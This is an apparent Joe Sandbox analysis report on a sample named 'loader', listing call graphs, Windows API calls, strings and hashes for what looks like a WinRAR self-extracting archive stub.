24219->24765 24766 119f5d 8 API calls ___scrt_fastfail 24219->24766 24221 11cde4 SendMessageW DeleteObject 24221->24214 24222->24002 24224 11a2e8 24223->24224 24229 11a30d 24223->24229 24767 1117ac CompareStringW 24224->24767 24225 11a312 SHAutoComplete 24226 11a31b 24225->24226 24231 11a7c3 24226->24231 24228 11a2fb 24228->24229 24230 11a2ff FindWindowExW 24228->24230 24229->24225 24229->24226 24230->24229 24232 11a7cd __EH_prolog 24231->24232 24233 101380 82 API calls 24232->24233 24234 11a7ef 24233->24234 24768 101f4f 24234->24768 24237 11a809 24239 101631 84 API calls 24237->24239 24238 11a818 24240 101951 126 API calls 24238->24240 24241 11a814 24239->24241 24242 11a83a __vsnwprintf_l ___std_exception_copy 24240->24242 24241->24029 24241->24034 24242->24241 24243 101631 84 API calls 24242->24243 24243->24241 24244->24012 24246 11ac74 5 API calls 24245->24246 24247 11cb66 GetDlgItem 24246->24247 24248 11cb88 24247->24248 24249 11cbbc SendMessageW SendMessageW 24247->24249 24252 11cb93 ShowWindow SendMessageW SendMessageW 24248->24252 24250 11cc17 SendMessageW SendMessageW SendMessageW 24249->24250 24251 11cbf8 24249->24251 24253 11cc4a SendMessageW 24250->24253 24254 11cc6d SendMessageW 24250->24254 24251->24250 24252->24249 24253->24254 24254->24032 24255->24088 24256->24113 24257->24119 24258->24124 24259->24128 24260->24137 24261->24067 24262->24083 24263->24064 24264->24053 24265->24145 24266->24143 24268 10a214 24267->24268 24269 10a238 24268->24269 24270 10a22b CreateDirectoryW 24268->24270 24271 10a180 4 API calls 24269->24271 24270->24269 24272 10a26b 24270->24272 24273 10a23e 24271->24273 24277 10a27a 24272->24277 24280 10a444 24272->24280 24274 10a27e GetLastError 24273->24274 24275 10b66c 2 API calls 24273->24275 24274->24277 24278 10a254 24275->24278 24277->24152 24278->24274 24279 10a258 CreateDirectoryW 24278->24279 24279->24272 24279->24274 24281 11e360 24280->24281 24282 10a451 SetFileAttributesW 24281->24282 24283 10a494 24282->24283 24284 10a467 24282->24284 24283->24277 24285 10b66c 2 API calls 24284->24285 24286 10a47b 24285->24286 24286->24283 24287 10a47f SetFileAttributesW 24286->24287 24287->24283 24288->24181 24289->24181 24290->24191 24291->24181 24292->24181 24293->24181 24295 10feba 24294->24295 24323 101789 24295->24323 24297 10fed2 24297->24195 24299 10fead 24298->24299 24300 101789 76 API calls 24299->24300 24301 10fed2 24300->24301 24301->24197 24303 107c72 __EH_prolog 24302->24303 24340 10c827 24303->24340 24305 107c8d 24306 11e24a new 8 API calls 24305->24306 24307 107cb7 24306->24307 24346 11440b 24307->24346 24310 107ddf 24311 107de9 24310->24311 24312 107e53 24311->24312 24375 10a4c6 24311->24375 24316 107ec4 24312->24316 24318 10a4c6 8 API calls 24312->24318 24353 10837f 24312->24353 24314 107f06 24314->24201 24316->24314 24381 106dc1 74 API calls 24316->24381 24318->24312 24320 107d09 24319->24320 24322 107d10 24319->24322 24321 111acf 84 API calls 24320->24321 24321->24322 24324 10179f 24323->24324 24335 1017fa __vsnwprintf_l 24323->24335 24325 1017c8 24324->24325 24336 106e91 74 API calls __vswprintf_c_l 24324->24336 24326 101827 24325->24326 24332 1017e7 ___std_exception_copy 24325->24332 24328 1235de 22 API calls 24326->24328 24330 10182e 24328->24330 24329 1017be 24337 106efd 75 API calls 24329->24337 24330->24335 24339 106efd 75 API calls 24330->24339 24332->24335 24338 106efd 75 API calls 24332->24338 24335->24297 24336->24329 24337->24325 24338->24335 24339->24335 24341 10c831 __EH_prolog 24340->24341 24342 11e24a new 8 API calls 24341->24342 24343 10c874 24342->24343 24344 11e24a new 8 API calls 24343->24344 24345 10c898 24344->24345 24345->24305 24347 114415 __EH_prolog 24346->24347 24348 11e24a new 8 API calls 24347->24348 24349 114431 24348->24349 24350 107ce6 24349->24350 24352 1106ba 78 API calls 24349->24352 24350->24310 24352->24350 24354 108389 __EH_prolog 24353->24354 24382 101380 24354->24382 24356 1083a4 24390 109ef7 24356->24390 24362 1083d3 24513 101631 24362->24513 24363 10846e 24409 108517 24363->24409 24367 1084ce 24416 101f00 24367->24416 24369 1083cf 24369->24362 24369->24363 24373 10a4c6 8 API calls 24369->24373 24517 10bac4 CompareStringW 24369->24517 24371 1084d9 24371->24362 24420 103aac 24371->24420 24430 10857b 24371->24430 24373->24369 24376 10a4db 24375->24376 24380 10a4df 24376->24380 24751 10a5f4 24376->24751 24378 10a4ef 24379 10a4f4 FindClose 24378->24379 24378->24380 24379->24380 24380->24311 24381->24314 24383 101385 __EH_prolog 24382->24383 24384 10c827 8 API calls 24383->24384 24385 1013bd 24384->24385 24386 11e24a new 8 API calls 24385->24386 24389 101416 ___scrt_fastfail 24385->24389 24387 101403 24386->24387 24388 10b07d 82 API calls 24387->24388 24387->24389 24388->24389 24389->24356 24391 109f0e 24390->24391 24392 1083ba 24391->24392 24518 106f5d 76 API calls 24391->24518 24392->24362 24394 1019a6 24392->24394 24395 1019b0 __EH_prolog 24394->24395 24402 1019e5 24395->24402 24407 101a00 24395->24407 24519 10709d 24395->24519 24397 101b50 24522 106dc1 74 API calls 24397->24522 24399 103aac 97 API calls 24404 101bb3 24399->24404 24400 101b60 24400->24399 24400->24402 24401 101bff 24401->24402 24406 101c32 24401->24406 24523 106dc1 74 API calls 24401->24523 24402->24369 24404->24401 24405 103aac 97 API calls 24404->24405 24405->24404 24406->24402 24408 103aac 97 API calls 24406->24408 24407->24397 24407->24400 24407->24402 24408->24406 24410 108524 24409->24410 24541 110c26 GetSystemTime SystemTimeToFileTime 24410->24541 24412 108488 24412->24367 24413 111359 24412->24413 24543 11d51a 24413->24543 24418 101f05 __EH_prolog 24416->24418 24417 101f39 24417->24371 24418->24417 24551 101951 24418->24551 24421 103ab8 24420->24421 24422 103abc 24420->24422 24421->24371 24423 103af7 24422->24423 24424 103ae9 24422->24424 24686 1027e8 97 API calls 3 library calls 24423->24686 24429 103b29 24424->24429 24685 103281 85 API calls 3 library calls 24424->24685 24427 103af5 24427->24429 24687 10204e 74 API calls 24427->24687 24429->24371 24431 108585 __EH_prolog 24430->24431 24432 1085be 24431->24432 24440 1085c2 24431->24440 24710 1184bd 99 API calls 24431->24710 24433 1085e7 24432->24433 24437 10867a 24432->24437 24432->24440 24434 108609 24433->24434 24433->24440 24711 107b66 151 API calls 24433->24711 24434->24440 24712 1184bd 99 API calls 24434->24712 24437->24440 24688 105e3a 24437->24688 24440->24371 24441 108705 24441->24440 24694 10826a 24441->24694 24444 108875 24445 10a4c6 8 API calls 24444->24445 24446 1088e0 24444->24446 24445->24446 24698 107d6c 24446->24698 24448 10c991 80 API calls 24451 10893b _memcmp 24448->24451 24449 108a70 24450 108b43 24449->24450 24457 108abf 24449->24457 24455 108b9e 24450->24455 24466 108b4e 24450->24466 24451->24440 24451->24448 24451->24449 24452 108a69 24451->24452 24713 108236 82 API calls 24451->24713 24714 101f94 74 API calls 24451->24714 24715 101f94 74 API calls 24452->24715 24464 108b30 24455->24464 24718 1080ea 96 API calls 24455->24718 24456 108b9c 24459 109653 79 API calls 24456->24459 24460 10a180 4 API calls 24457->24460 24457->24464 24458 109653 79 API calls 24458->24440 24459->24440 24462 108af7 24460->24462 24462->24464 24716 109377 96 API calls 24462->24716 24463 108c09 24465 109989 GetFileType 24463->24465 24476 108c74 24463->24476 24512 1091c1 __except_handler4 24463->24512 24464->24456 24464->24463 24468 108c4c 24465->24468 24466->24456 24717 107f26 100 API calls __except_handler4 24466->24717 24467 10aa88 8 API calls 24470 108cc3 24467->24470 24468->24476 24719 101f94 74 API calls 24468->24719 24472 10aa88 8 API calls 24470->24472 24491 108cd9 24472->24491 24474 108c62 24720 107061 75 API calls 24474->24720 24476->24467 24477 108d9c 24478 108df7 24477->24478 24479 108efd 24477->24479 24480 108e69 24478->24480 24483 108e07 24478->24483 24481 108f23 24479->24481 24482 108f0f 24479->24482 24501 108e27 24479->24501 24484 10826a CharUpperW 24480->24484 24486 112c42 75 API calls 24481->24486 24485 1092e6 121 API calls 24482->24485 24487 108e4d 24483->24487 24492 108e15 24483->24492 24488 108e84 24484->24488 24485->24501 24490 108f3c 24486->24490 24487->24501 24723 107907 108 API calls 24487->24723 24496 108eb4 24488->24496 24497 108ead 24488->24497 24488->24501 24726 1128f1 121 API calls 24490->24726 24491->24477 24721 109b21 SetFilePointer GetLastError SetEndOfFile 24491->24721 24722 101f94 74 API calls 24492->24722 24725 109224 94 API calls __EH_prolog 24496->24725 24724 107698 84 API calls __except_handler4 24497->24724 24503 10904b 24501->24503 24727 101f94 74 API calls 24501->24727 24502 109156 24504 10a444 4 API calls 24502->24504 24502->24512 24503->24502 24505 109104 24503->24505 24503->24512 24704 109ebf SetEndOfFile 24503->24704 24506 1091b1 24504->24506 24705 109d62 24505->24705 24506->24512 24728 101f94 74 API calls 24506->24728 24509 10914b 24510 1096d0 75 API calls 24509->24510 24510->24502 24512->24458 24514 101643 24513->24514 24743 10c8ca 24514->24743 24517->24369 24518->24392 24524 1016d2 24519->24524 24521 1070b9 24521->24407 24522->24402 24523->24406 24525 1016e8 24524->24525 24536 101740 __vsnwprintf_l 24524->24536 24526 101711 24525->24526 24537 106e91 74 API calls __vswprintf_c_l 24525->24537 24528 101767 24526->24528 24533 10172d ___std_exception_copy 24526->24533 24530 1235de 22 API calls 24528->24530 24529 101707 24538 106efd 75 API calls 24529->24538 24532 10176e 24530->24532 24532->24536 24540 106efd 75 API calls 24532->24540 24533->24536 24539 106efd 75 API calls 24533->24539 24536->24521 24537->24529 24538->24526 24539->24536 24540->24536 24542 110c56 __vswprintf_c_l 24541->24542 24542->24412 24544 11d527 24543->24544 24545 10ddd1 53 API calls 24544->24545 24546 11d54a 24545->24546 24547 10400a _swprintf 51 API calls 24546->24547 24548 11d55c 24547->24548 24549 11cb5a 16 API calls 24548->24549 24550 111372 24549->24550 24550->24367 24552 101961 24551->24552 24554 10195d 24551->24554 24555 101896 24552->24555 24554->24417 24556 1018a8 24555->24556 24557 1018e5 24555->24557 24558 103aac 97 API calls 24556->24558 24563 103f18 24557->24563 24562 1018c8 24558->24562 24562->24554 24566 103f21 24563->24566 24564 103aac 97 API calls 24564->24566 24566->24564 24567 101906 24566->24567 24580 11067c 24566->24580 24567->24562 24568 101e00 24567->24568 24569 101e0a __EH_prolog 24568->24569 24588 103b3d 24569->24588 24571 101e34 24572 1016d2 76 API calls 24571->24572 24573 101ebb 24571->24573 24574 101e4b 24572->24574 24573->24562 24616 101849 76 API calls 24574->24616 24576 101e63 24578 101e6f 24576->24578 24617 11137a MultiByteToWideChar 24576->24617 24618 101849 76 API calls 24578->24618 24581 110683 24580->24581 24582 11069e 24581->24582 24586 106e8c RaiseException CallUnexpected 24581->24586 24584 1106af SetThreadExecutionState 24582->24584 24587 106e8c RaiseException CallUnexpected 24582->24587 24584->24566 24586->24582 24587->24584 24589 103b47 __EH_prolog 24588->24589 24590 103b79 24589->24590 24591 103b5d 24589->24591 24593 103dc2 24590->24593 24596 103ba5 24590->24596 24647 106dc1 74 API calls 24591->24647 24664 106dc1 74 API calls 24593->24664 24595 103b68 24595->24571 24596->24595 24619 112c42 24596->24619 24598 103c26 24600 103cb1 24598->24600 24615 103c1d 24598->24615 24650 10c991 24598->24650 24599 103c22 24599->24598 24649 102034 76 API calls 24599->24649 24632 10aa88 24600->24632 24602 103c12 24648 106dc1 74 API calls 24602->24648 24603 103bf4 24603->24598 24603->24599 24603->24602 24605 103cc4 24609 103d48 24605->24609 24610 103d3e 24605->24610 24656 1128f1 121 API calls 24609->24656 24636 1092e6 24610->24636 24613 103d46 24613->24615 24657 101f94 74 API calls 24613->24657 24658 111acf 24615->24658 24616->24576 24617->24578 24618->24573 24620 112c51 24619->24620 24622 112c5b 24619->24622 24665 106efd 75 API calls 24620->24665 24623 112ca2 ___std_exception_copy 24622->24623 24625 112c9d Concurrency::cancel_current_task 24622->24625 24631 112cfd ___scrt_fastfail 24622->24631 24624 112da9 Concurrency::cancel_current_task 24623->24624 24626 112cd9 24623->24626 24623->24631 24668 12157a RaiseException 24624->24668 24667 12157a RaiseException 24625->24667 24666 112b7b 75 API calls 4 library calls 24626->24666 24630 112dc1 24631->24603 24631->24631 24633 10aa95 24632->24633 24635 10aa9f 24632->24635 24634 11e24a new 8 API calls 24633->24634 24634->24635 24635->24605 24637 1092f0 __EH_prolog 24636->24637 24669 107dc6 24637->24669 24640 10709d 76 API calls 24641 109302 24640->24641 24672 10ca6c 24641->24672 24643 109314 24644 10935c 24643->24644 24646 10ca6c 114 API calls 24643->24646 24681 10cc51 97 API calls __vsnwprintf_l 24643->24681 24644->24613 24646->24643 24647->24595 24648->24615 24649->24598 24651 10c9b2 24650->24651 24652 10c9c4 24650->24652 24682 106249 80 API calls 24651->24682 24683 106249 80 API calls 24652->24683 24655 10c9bc 24655->24600 24656->24613 24657->24615 24659 111ad9 24658->24659 24660 111af2 24659->24660 24663 111b06 24659->24663 24684 11075b 84 API calls 24660->24684 24662 111af9 24662->24663 24664->24595 24665->24622 24666->24631 24667->24624 24668->24630 24670 10acf5 GetVersionExW 24669->24670 24671 107dcb 24670->24671 24671->24640 24678 10ca82 __vsnwprintf_l 24672->24678 24673 10cbf7 24674 10cc1f 24673->24674 24675 10ca0b 6 API calls 24673->24675 24676 11067c SetThreadExecutionState RaiseException 24674->24676 24675->24674 24679 10cbee 24676->24679 24677 1184bd 99 API calls 24677->24678 24678->24673 24678->24677 24678->24679 24680 10ab70 89 API calls 24678->24680 24679->24643 24680->24678 24681->24643 24682->24655 24683->24655 24684->24662 24685->24427 24686->24427 24687->24429 24689 105e4a 24688->24689 24729 105d67 24689->24729 24692 105e7d 24693 105eb5 24692->24693 24734 10ad65 CharUpperW CompareStringW 24692->24734 24693->24441 24695 108289 24694->24695 24740 11179d CharUpperW 24695->24740 24697 108333 24697->24444 24699 107d7b 24698->24699 24700 107dbb 24699->24700 24741 107043 74 API calls 24699->24741 24700->24451 24702 107db3 24742 106dc1 74 API calls 24702->24742 24704->24505 24706 109d73 24705->24706 24709 109d82 24705->24709 24707 109d79 FlushFileBuffers 24706->24707 24706->24709 24707->24709 24708 109dfb SetFileTime 24708->24509 24709->24708 24710->24432 24711->24434 24712->24440 24713->24451 24714->24451 24715->24449 24716->24464 24717->24456 24718->24464 24719->24474 24720->24476 24721->24477 24722->24501 24723->24501 24724->24501 24725->24501 24726->24501 24727->24503 24728->24512 24735 105c64 24729->24735 24731 105d88 24731->24692 24733 105c64 2 API calls 24733->24731 24734->24692 24736 105c6e 24735->24736 24738 105d56 24736->24738 24739 10ad65 CharUpperW CompareStringW 24736->24739 24738->24731 24738->24733 24739->24736 24740->24697 24741->24702 24742->24700 24744 10c8db 24743->24744 24749 10a90e 84 API calls 24744->24749 24746 10c90d 24750 10a90e 84 API calls 24746->24750 24748 10c918 24749->24746 24750->24748 24752 10a5fe 24751->24752 24753 10a691 FindNextFileW 24752->24753 24754 10a621 FindFirstFileW 24752->24754 24756 10a6b0 24753->24756 24757 10a69c GetLastError 24753->24757 24755 10a638 24754->24755 24762 10a675 24754->24762 24758 10b66c 2 API calls 24755->24758 24756->24762 24757->24756 24759 10a64d 24758->24759 24760 10a651 FindFirstFileW 24759->24760 24761 10a66a GetLastError 24759->24761 24760->24761 24760->24762 24761->24762 24762->24378 24763->24212 24764->24219 24765->24219 24766->24221 24767->24228 24769 109ef7 76 API calls 24768->24769 24770 101f5b 24769->24770 24771 1019a6 97 API calls 24770->24771 24774 101f78 24770->24774 24772 101f68 24771->24772 24772->24774 24775 106dc1 74 API calls 24772->24775 24774->24237 24774->24238 24775->24774 24828 11b8e0 93 API calls _swprintf 24829 118ce0 6 API calls 24832 1316e0 CloseHandle

              Executed Functions

              Function 0011D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 001100CF: GetModuleHandleW.KERNEL32(kernel32), ref: 001100E4
                • Part of subcall function 001100CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001100F6
                • Part of subcall function 001100CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00110127
                • Part of subcall function 00119DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00119DAC
                • Part of subcall function 0011A335: OleInitialize.OLE32(00000000), ref: 0011A34E
                • Part of subcall function 0011A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0011A385
                • Part of subcall function 0011A335: SHGetMalloc.SHELL32(00148430), ref: 0011A38F
                • Part of subcall function 001113B3: GetCPInfo.KERNEL32(00000000,?), ref: 001113C4
                • Part of subcall function 001113B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 001113D8
              • GetCommandLineW.KERNEL32 ref: 0011D61C
              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0011D643
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0011D654
              • UnmapViewOfFile.KERNEL32(00000000), ref: 0011D68E
                • Part of subcall function 0011D287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0011D29D
                • Part of subcall function 0011D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0011D2D9
              • CloseHandle.KERNEL32(00000000), ref: 0011D697
              • GetModuleFileNameW.KERNEL32(00000000,0015DC90,00000800), ref: 0011D6B2
              • SetEnvironmentVariableW.KERNEL32(sfxname,0015DC90), ref: 0011D6BE
              • GetLocalTime.KERNEL32(?), ref: 0011D6C9
              • _swprintf.LIBCMT ref: 0011D708
              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0011D71A
              • GetModuleHandleW.KERNEL32(00000000), ref: 0011D721
              • LoadIconW.USER32(00000000,00000064), ref: 0011D738
              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0011D789
              • Sleep.KERNEL32(?), ref: 0011D7B7
              • DeleteObject.GDI32 ref: 0011D7F0
              • DeleteObject.GDI32(?), ref: 0011D800
              • CloseHandle.KERNEL32 ref: 0011D843
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
              • API String ID: 788466649-3743209390
              • Opcode ID: d914b1aebfa860b5b71aaa1145fb5e2bab728657dc241b377559f5146321b24c
              • Instruction ID: fd370f7327e9ce470f8dc48fc8b7ad4d38274da9c5247511df8f10156f42ca1d
              • Opcode Fuzzy Hash: d914b1aebfa860b5b71aaa1145fb5e2bab728657dc241b377559f5146321b24c
              • Instruction Fuzzy Hash: 64610471904301EFD328AFB5EC49FAB3BE8AB55701F040439F945A65A1DBB8D9C4C7A2
              Function 00119E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 770 119e1c-119e38 FindResourceW 771 119f2f-119f32 770->771 772 119e3e-119e50 SizeofResource 770->772 773 119e70-119e72 772->773 774 119e52-119e61 LoadResource 772->774 776 119f2e 773->776 774->773 775 119e63-119e6e LockResource 774->775 775->773 777 119e77-119e8c GlobalAlloc 775->777 776->771 778 119e92-119e9b GlobalLock 777->778 779 119f28-119f2d 777->779 780 119f21-119f22 GlobalFree 778->780 781 119ea1-119ebf call 11f4b0 CreateStreamOnHGlobal 778->781 779->776 780->779 784 119ec1-119ee3 call 119d7b 781->784 785 119f1a-119f1b GlobalUnlock 781->785 784->785 790 119ee5-119eed 784->790 785->780 791 119f08-119f16 790->791 792 119eef-119f03 GdipCreateHBITMAPFromBitmap 790->792 791->785 792->791 793 119f05 792->793 793->791
              APIs
              • FindResourceW.KERNEL32(0011AE4D,PNG,?,?,?,0011AE4D,00000066), ref: 00119E2E
              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0011AE4D,00000066), ref: 00119E46
              • LoadResource.KERNEL32(00000000,?,?,?,0011AE4D,00000066), ref: 00119E59
              • LockResource.KERNEL32(00000000,?,?,?,0011AE4D,00000066), ref: 00119E64
              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0011AE4D,00000066), ref: 00119E82
              • GlobalLock.KERNEL32(00000000), ref: 00119E93
              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00119EB7
              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00119EFC
              • GlobalUnlock.KERNEL32(00000000), ref: 00119F1B
              • GlobalFree.KERNEL32(00000000), ref: 00119F22
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
              • String ID: PNG
              • API String ID: 3656887471-364855578
              • Opcode ID: a9f7049c7b7f492d55511dd958b2cef3f04accb4f2c37b16ad619646d881dbe6
              • Instruction ID: f09532fb935e1275a23162b8c26411b1ffd8c9c3595d8ef567888e21b56cb1d8
              • Opcode Fuzzy Hash: a9f7049c7b7f492d55511dd958b2cef3f04accb4f2c37b16ad619646d881dbe6
              • Instruction Fuzzy Hash: 4231C275204702AFC7159F21EC589ABBFADFF89751B040538F922D2660DB71DC81CBA5
              Function 0010A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 970 10a5f4-10a61f call 11e360 973 10a691-10a69a FindNextFileW 970->973 974 10a621-10a632 FindFirstFileW 970->974 977 10a6b0-10a6b2 973->977 978 10a69c-10a6aa GetLastError 973->978 975 10a6b8-10a75c call 10fe56 call 10bcfb call 110e19 * 3 974->975 976 10a638-10a64f call 10b66c 974->976 980 10a761-10a774 975->980 985 10a651-10a668 FindFirstFileW 976->985 986 10a66a-10a673 GetLastError 976->986 977->975 977->980 978->977 985->975 985->986 988 10a684 986->988 989 10a675-10a678 986->989 992 10a686-10a68c 988->992 989->988 991 10a67a-10a67d 989->991 991->988 994 10a67f-10a682 991->994 992->980 994->992
              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A628
              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A65E
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A66A
              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A692
              • GetLastError.KERNEL32(?,?,?,?,0010A4EF,000000FF,?,?), ref: 0010A69E
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FileFind$ErrorFirstLast$Next
              • String ID:
              • API String ID: 869497890-0
              • Opcode ID: b484f726ab5333a8066ae9ae1dea640a76ee7ca541b5246a6579cd732318e2c7
              • Instruction ID: c38891dc0c0d37ed008de54e3e186bcd362c04d40a20419700a625128f6e9b40
              • Opcode Fuzzy Hash: b484f726ab5333a8066ae9ae1dea640a76ee7ca541b5246a6579cd732318e2c7
              • Instruction Fuzzy Hash: 34416172504341AFC324EF68C884ADAF7F8BF58350F440A2AF5E9D3240D7B5A9948B92
              Function 0012753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(00000000,?,00127513,00000000,0013BAD8,0000000C,0012766A,00000000,00000002,00000000), ref: 0012755E
              • TerminateProcess.KERNEL32(00000000,?,00127513,00000000,0013BAD8,0000000C,0012766A,00000000,00000002,00000000), ref: 00127565
              • ExitProcess.KERNEL32 ref: 00127577
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 0fea27aabb4f9ee718d62902cc1c05da50d79f4f3c35e37877c8481aa2dff280
              • Instruction ID: d36e6b1bcc2c496b2806dba6a522c7491cf8126ac2cf62f53c75fd38f4765a39
              • Opcode Fuzzy Hash: 0fea27aabb4f9ee718d62902cc1c05da50d79f4f3c35e37877c8481aa2dff280
              • Instruction Fuzzy Hash: 41E0EC31004958AFCF11AF64ED09A4ABF69EF50742F108414F9158A672CB35DEA2CB54
              Function 0010857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID:
              • API String ID: 3004599000-0
              • Opcode ID: ec7ad05abe0155db142afead80b4a377a66a027473fdd7f62210b217ea03fe77
              • Instruction ID: 1a010c837b2ecda2159e0f7b086a01f9f4dfe0619952c3ac1f29793911ee5320
